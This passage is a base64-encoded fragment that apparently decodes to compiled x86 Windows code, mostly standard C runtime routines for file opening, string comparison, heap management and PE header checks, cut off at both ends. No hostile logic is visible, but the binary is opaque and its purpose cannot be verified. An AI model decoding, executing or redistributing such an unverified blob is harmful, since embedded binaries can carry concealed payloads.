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/VYvsVot1CIX2D4SBAQAA/3YE6Dya////dgjoNJr///92DOgsmv///3YQ6CSa////dhToHJr///92GOgUmv///zboDZr///92IOgFmv///3Yk6P2Z////dijo9Zn///92LOjtmf///3Yw6OWZ////djTo3Zn///92HOjVmf///3Y46M2Z////djzoxZn//4PEQP92QOi6mf///3ZE6LKZ////dkjoqpn///92TOiimf///3ZQ6JqZ////dlTokpn///92WOiKmf///3Zc6IKZ////dmDoepn///92ZOhymf///3Zo6GqZ////dmzoYpn///92cOhamf///3Z06FKZ////dnjoSpn///92fOhCmf//g8RA/7aAAAAA6DSZ////toQAAADoKZn///+2iAAAAOgemf///7aMAAAA6BOZ////tpAAAADoCJn///+2lAAAAOj9mP///7aYAAAA6PKY////tpwAAADo55j///+2oAAAAOjcmP///7akAAAA6NGY////tqgAAADoxpj//4PELF5dw4v/VYvsVot1CIX2dDWLBjsFeB5BAHQHUOijmP//WYtGBDsFfB5BAHQHUOiRmP//WYt2CDs1gB5BAHQHVuh/mP//WV5dw4v/VYvsVot1CIX2dH6LRgw7BYQeQQB0B1DoXZj//1mLRhA7BYgeQQB0B1DoS5j//1mLRhQ7BYweQQB0B1DoOZj//1mLRhg7BZAeQQB0B1DoJ5j//1mLRhw7BZQeQQB0B1DoFZj//1mLRiA7BZgeQQB0B1DoA5j//1mLdiQ7NZweQQB0B1bo8Zf//1leXcPMzMzMzMzMzFWL7FYzwFBQUFBQUFBQi1UMjUkAigIKwHQJg8IBD6sEJOvxi3UIg8n/jUkAg8EBigYKwHQJg8YBD6MEJHPui8GDxCBeycPMzMzMzMzMzMzMi1QkBItMJAj3wgMAAAB1PIsCOgF1LgrAdCY6YQF1JQrkdB3B6BA6QQJ1GQrAdBE6YQN1EIPBBIPCBArkddKL/zPAw5AbwNHgg8ABw/fCAQAAAHQYigKDwgE6AXXng8EBCsB03PfCAgAAAHSkZosCg8ICOgF1zgrAdMY6YQF1xQrkdL2DwQLriMzMzMzMzMzMVYvsVjPAUFBQUFBQUFCLVQyNSQCKAgrAdAmDwgEPqwQk6/GLdQiL/4oGCsB0DIPGAQ+jBCRz8Y1G/4PEIF7Jw4v/VYvsUVaLdQxW6PB+//+JRQyLRgxZqIJ1Gegtbv//xwAJAAAAg04MILj//wAA6T0BAACoQHQN6BBu///HACIAAADr4agBdBeDZgQAqBAPhI0AAACLTgiD4P6JDolGDItGDINmBACDZfwAU2oCg+DvWwvDiUYMqQwBAAB1LOhFdP//g8AgO/B0DOg5dP//g8BAO/B1Df91DOiOrf//WYXAdQdW6Dqt//9Z90YMCAEAAFcPhIMAAACLRgiLPo1IAokOi04YK/gry4lOBIX/fh1XUP91DOijkf//g8QMiUX8606DyCCJRgzpPf///4tNDIP5/3Qbg/n+dBaLwYPgH4vRwfoFweAGAwSVoCtBAOsFuNAVQQD2QAQgdBVTagBqAFHopKv//yPCg8QQg/j/dC2LRgiLX